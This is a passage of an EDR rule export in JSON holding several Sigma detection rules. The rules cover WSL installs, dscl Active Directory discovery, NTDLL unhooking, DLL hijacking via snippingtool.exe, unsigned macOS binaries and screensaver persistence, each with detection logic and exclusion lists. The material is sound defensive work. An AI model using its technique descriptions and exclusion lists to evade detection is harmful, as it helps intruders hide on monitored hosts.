'ParrotOS'\n\n condition: selection and not 1 of filter_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcc69e05-74b1-4e8a-a053-2735ce47212e",
"rule_name": "Linux Distribution Installed Under WSL",
"rule_description": "Detects the installation of a Linux distribution through WSL (Windows Subsystem For Linux).\nWSL allows running Linux binary executables natively on Windows systems.\nWhile WSL has legitimate uses for development and administration, threat actors may abuse it to evade Windows security controls and execute malicious code.\nIt is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\n",
"rule_creation_date": "2025-01-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcce9532-5137-41f9-afeb-b3c78f1d562e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617819Z",
"creation_date": "2026-03-23T11:45:34.617821Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617825Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1069_002_dscl_active_directory_macos.yml",
"content": "title: Active Directory Discovered via dscl\nid: bcce9532-5137-41f9-afeb-b3c78f1d562e\ndescription: |\n Detects the execution of the dscl command to list Active Directory accounts or groups.\n Adversaries may attempt to get a listing of domain accounts and groups to determine which domain accounts exist and to determine which users have elevated permissions, such as domain administrators.\n It is recommended to check for malicious behavior by the process launching dscl and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n\nreferences:\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/dscl'\n CommandLine|contains: '/Active Directory/'\n\n exclusion_jamf:\n ParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_haxm:\n GrandparentImage: '/usr/local/haxm/haxm-launcher'\n\n exclusion_landesk:\n GrandparentImage: '/Library/Application Support/LANDesk/bin/ldapm'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcce9532-5137-41f9-afeb-b3c78f1d562e",
"rule_name": "Active Directory Discovered via dscl",
"rule_description": "Detects the execution of the dscl command to list Active Directory accounts or groups.\nAdversaries may attempt to get a listing of domain accounts and groups to determine which domain accounts exist and to determine which users have elevated permissions, such as domain administrators.\nIt is recommended to check for malicious behavior by the process launching dscl and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073034Z",
"creation_date": "2026-03-23T11:45:34.073036Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1569399429777526785",
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_ntdll_loading_from_suspicious_location.yml",
"content": "title: Windows NTDLL Loaded from Suspicious Location\nid: bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa\ndescription: |\n Detects the loading of the Microsoft NT Layer DLL (NTDLL) from a location different than the Windows system folder.\n This can be indicative of userland hooking bypass by loading a fresh, unhooked NTDLL.\n It is recommended to investigate the process loading the NTDLL to look for malicious content or actions.\nreferences:\n - https://twitter.com/SBousseaden/status/1569399429777526785\n - https://attack.mitre.org/techniques/T1562/\ndate: 2022/09/19\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n OriginalFileName: 'ntdll.dll'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_legitimate_image:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SyChpe32\\' # x86-on-ARM\n - '?:\\Windows\\WinSxS\\'\n # Very weird cases when a host loads an NTDLL present on the mounted\n # disk of another machine...\n - '\\\\\\*\\\\?$\\Windows\\System32\\'\n - '\\\\\\*\\\\?$\\Windows\\SysWOW64\\'\n - '\\\\\\*\\\\?$\\Windows\\SyChpe32\\' # x86-on-ARM\n - '\\\\\\*\\\\?$\\Windows\\WinSxS\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_mediview:\n ImageLoaded|startswith:\n - '?:\\Mediview\\resources\\utils\\mben\\'\n - '?:\\Mediview\\resources\\utils\\imageenhance\\'\n\n exclusion_safe_os:\n ImageLoaded: '?:\\$WINDOWS.~BT\\Sources\\SafeOS\\SafeOS.Mount\\Windows\\System32\\ntdll.dll'\n\n exclusion_vss:\n ImageLoaded: '\\\\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\System32\\ntdll.dll'\n\n exclusion_ccmexec:\n # 
C:\\Windows\\SoftwareDistribution\\Download\\2bb04f6f8c5f4e57fe18b3aa6b335e19\\amd64_microsoft-windows-ntdll_31bf3856ad364e35_6.1.7601.24260_none_b74c23c82c1754c1\\ntdll.dll\n ImageLoaded: '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\amd64_microsoft-windows-ntdll*'\n ProcessImage: '?:\\WINDOWS\\CCM\\CcmExec.exe'\n\n exclusion_dlservice:\n ProcessImage:\n - '?:\\Program Files\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files (x86)\\DeviceLock\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\DLService.exe'\n - '?:\\Program Files (x86)\\BackupClient\\DeviceLock\\DLService.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Acronis International GmbH'\n - 'DeviceLock, Inc'\n # ImageLoaded: '?:\\Program Files\\DeviceLock Agent\\DL????.tmp'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n\n exclusion_gameguard_gamemon:\n # C:\\Program Files (x86)\\Steam\\steamapps\\common\\Summoners War Chronicles\\GameGuard\\GameMon.des\n ProcessSigned: 'true'\n ProcessSignature: 'INCA Internet Co.,Ltd.'\n ProcessImage:\n - '*\\GameGuard\\GameMon64.des'\n - '*\\GameGuard\\GameMon.des'\n\n exclusion_devicelock:\n ProcessImage:\n - '?:\\Program Files\\DeviceLock Agent\\DLService.exe'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\DLPService.exe'\n ProcessCompany:\n - 'DeviceLock, Inc'\n - 'Acronis International GmbH'\n ImageLoaded:\n - '?:\\Program Files\\DeviceLock Agent\\\\*.tmp'\n - '?:\\Program Files\\BackupClient\\DeviceLock\\\\*.tmp'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bcf0b2cb-5479-4c69-a09a-83fa7f36b5fa",
"rule_name": "Windows NTDLL Loaded from Suspicious Location",
"rule_description": "Detects the loading of the Microsoft NT Layer DLL (NTDLL) from a location different than the Windows system folder.\nThis can be indicative of userland hooking bypass by loading a fresh, unhooked NTDLL.\nIt is recommended to investigate the process loading the NTDLL to look for malicious content or actions.\n",
"rule_creation_date": "2022-09-19",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd1ecd51-88ca-462b-97a4-f0fa469ff509",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618170Z",
"creation_date": "2026-03-23T11:45:34.618172Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618176Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_untrusted_process_execution.yml",
"content": "title: Untrusted Process Executed from an Uncommon Location\nid: bd1ecd51-88ca-462b-97a4-f0fa469ff509\ndescription: |\n Detects an unsigned or self-signed binary being launched from an uncommon folder.\n Attackers may use unsigned or self-signed binaries in order to execute malicious commands and bypass defenses.\n It is recommended to check any children of this process and the activities of the parent for other malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/07/22\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_folder:\n Image|startswith:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Library/PrivilegedHelperTools/'\n\n selection_unsigned:\n - Signed: 'false'\n - Signed: 'true'\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n exclusion_homebrew:\n - ProcessParentImage|startswith:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessGrandparentImage|startswith:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessParentCommandLine|contains:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n - ProcessGrandparentCommandLine|contains:\n - '/opt/homebrew/'\n - '/Users/*/.brew/'\n\n exclusion_nix:\n - ProcessImage|startswith: '/nix/store/'\n ProcessSigned: 'true'\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n - ProcessParentImage|startswith: '/nix/store/'\n ProcessParentSigned: 'true'\n ProcessParentCodesigningFlagsStr|contains: 'CS_ADHOC'\n - ProcessImage|startswith: '/private/tmp/nix-build-'\n\n exclusion_cleanmymac:\n SignatureSigningId: 'com.macpaw.CleanMyMac4.Agent'\n Image: '/Library/PrivilegedHelperTools/com.macpaw.CleanMyMac4.Agent'\n Signed: 'true'\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n 
exclusion_epicgames:\n Image|startswith: '/Users/Shared/Epic Games/UE_*/Engine/'\n\n exclusion_parallels:\n Image|startswith: '/Users/Shared/Parallels/'\n\n exclusion_tunnelin:\n Image: '/private/etc/tunnelin_client/tunnelin_client'\n\n exclusion_openssl:\n Image: '/private/tmp/openssl*/openssl-*/*'\n\n exclusion_docker:\n Image: '/Library/PrivilegedHelperTools/com.docker.socket'\n\n exclusion_pkinstall:\n Image|startswith: '/private/tmp/PKInstallSandbox.'\n\n exclusion_cmake:\n Image|startswith: '/private/tmp/cmake'\n\n exclusion_bazel:\n - GrandparentImage|startswith: '/private/var/tmp/_bazel*/'\n - ParentImage|startswith: '/private/var/tmp/_bazel*/'\n - Image|startswith: '/private/var/tmp/_bazel*/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd1ecd51-88ca-462b-97a4-f0fa469ff509",
"rule_name": "Untrusted Process Executed from an Uncommon Location",
"rule_description": "Detects an unsigned or self-signed binary being launched from an uncommon folder.\nAttackers may use unsigned or self-signed binaries in order to execute malicious commands and bypass defenses.\nIt is recommended to check any children of this process and the activities of the parent for other malicious behavior.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-10-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd421807-c4fb-499a-8693-4f2cabebf246",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586675Z",
"creation_date": "2026-03-23T11:45:34.586679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586687Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_snippingtool.yml",
"content": "title: DLL Hijacking via snippingtool.exe\nid: bd421807-c4fb-499a-8693-4f2cabebf246\ndescription: |\n Detects potential Windows DLL Hijacking via snippingtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'snippingtool.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\msdrm.dll'\n - '\\oleacc.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd421807-c4fb-499a-8693-4f2cabebf246",
"rule_name": "DLL Hijacking via snippingtool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via snippingtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd48810c-d072-43af-ba2d-ae8b2fda0912",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620531Z",
"creation_date": "2026-03-23T11:45:34.620533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620537Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1546/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1546_002_registry_screensaver_modification.yml",
"content": "title: Screensaver Path Changed in Registry\nid: bd48810c-d072-43af-ba2d-ae8b2fda0912\ndescription: |\n Detects a modification of the screensaver key in the registry.\n Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.\n It is recommended to investigate the process that modified the registry value and to verify the legitimacy of the .scr file added as the new screensaver.\nreferences:\n - https://attack.mitre.org/techniques/T1546/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2022/11/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Control Panel\\Desktop\\SCRNSAVE.exe'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n - '-'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessParentSigned: 'true'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n 
ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_schedule:\n ProcessGrandparentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions 10 before 1703\n - '\\taskeng.exe' # on older windows versions\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_mtxproxy:\n - ProcessGrandparentImage|endswith: 'mtxproxy.exe'\n - ProcessParentImage|endswith: 'mtxproxy.exe'\n\n exclusion_maincare:\n - ProcessCompany: 'Maincare Solutions'\n - Details:\n - '?:\\Windows\\TEMP\\CWSSO\\SCREEN~1.SCR'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\CWSSO\\SCREEN~1.SCR'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CWSSO\\SCREEN~1.SCR'\n\n exclusion_bmc:\n ProcessCurrentDirectory: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin'\n ProcessCommandLine: 'REG ADD HKCU\\Control Panel\\Desktop /v SCRNSAVE.EXE /t REG_SZ /d ?:\\windows\\system32\\PhotoScreensaver.scr /f'\n Details: '?:\\windows\\system32\\PhotoScreensaver.scr'\n\n # this is the default screensaver\n exclusion_scrnsave:\n Details:\n - 'scrnsave.scr'\n - '?:\\windows\\system32\\scrnsave.scr'\n - '%windir%\\system32\\scrnsave.scr'\n\n exclusion_ribbons:\n Details:\n - 'Ribbons.scr'\n - '?:\\Windows\\system32\\Ribbons.scr'\n - '%windir%\\system32\\Ribbons.scr'\n\n exclusion_shell32:\n ProcessCommandLine: '?:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL desk.cpl,ScreenSaver,@ScreenSaver'\n\n exclusion_migration1:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessParentImage|endswith:\n - '\\SetupHost.exe'\n - '\\SetupPlatform.exe'\n exclusion_migration2:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\OSDUpgradeOS.exe|?:\\Windows\\CCM\\TSManager.exe|'\n\n exclusion_setuphost:\n ProcessImage: 
'?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n #ProcessParentImage: '?:\\Windows\\SoftwareDistribution\\\\*\\WindowsUpdateBox.exe'\n #ProcessGrandparentImage: '?:\\Windows\\System32\\wuauclt.exe'\n\n exclusion_asus:\n ProcessOriginalFileName: 'AsusOptimizationStartupTask.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ASUSTeK COMPUTER INC.'\n\n exclusion_mighost:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n Details: '?:\\windows\\system32\\PhotoScreensaver.scr'\n\n exclusion_bubbles:\n Details: '?:\\windows\\system32\\Bubbles.scr'\n\n exclusion_netplay:\n ProcessImage:\n - '?:\\Program Files (x86)\\Netpresenter\\NetPlay.exe'\n - '?:\\Program Files\\Netpresenter\\NetPlay.exe'\n - '?:\\Program Files (x86)\\Netpresenter\\NpAgent.exe'\n - '?:\\Program Files\\Netpresenter\\NpAgent.exe'\n Details: '?:\\Windows\\NETPRE~1.SCR'\n\n exclusion_mindray:\n ProcessImage:\n - '?:\\Program Files (x86)\\Mindray CMS\\CmsDaemon\\CMSStation.exe'\n - '?:\\Program Files\\Mindray CMS\\CmsDaemon\\CMSStation.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_mcafee:\n # McAfee DLP Endpoint Service\n ProcessOriginalFileName: 'fcags.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_configsecuritypolicy:\n ProcessOriginalFileName: 'ConfigSecurityPolicy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_clmlive:\n ProcessGrandparentImage: '?:\\AVI\\CLMLIVE\\ClmLive.exe'\n ProcessParentImage: '?:\\AVI\\CLMLIVE\\jre?_64\\bin\\javaw.exe'\n Details:\n - '?:\\AVI\\Jeep-Java\\Jeep-Java.scr'\n - '?:\\AVI\\JEEP\\jeep.scr'\n\n exclusion_amcorre:\n ProcessOriginalFileName: 'AMCORRE.EXE'\n ProcessLegalCopyright: 'Maincare Solutions France 1999-202?'\n Details: 
'?:\\WINDOWS\\system32\\PhotoScreensaver.scr'\n\n exclusion_sccm:\n ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ivanti:\n ProcessOriginalFileName: 'pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_mediqual:\n ProcessImage: '?:\\Program Files (x86)\\Mediqual7\\M61W7C.exe'\n ProcessOriginalFileName: 'MediFrameWork.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd48810c-d072-43af-ba2d-ae8b2fda0912",
"rule_name": "Screensaver Path Changed in Registry",
"rule_description": "Detects a modification of the screensaver key in the registry.\nAdversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.\nIt is recommended to investigate the process that modified the registry value and to verify the legitimacy of the .scr file added as the new screensaver.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd60d353-8f30-4566-9840-622d4dbb9b5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092779Z",
"creation_date": "2026-03-23T11:45:34.092781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group",
"https://attack.mitre.org/techniques/T1647/"
],
"name": "t1647_defaults_plist_modification.yml",
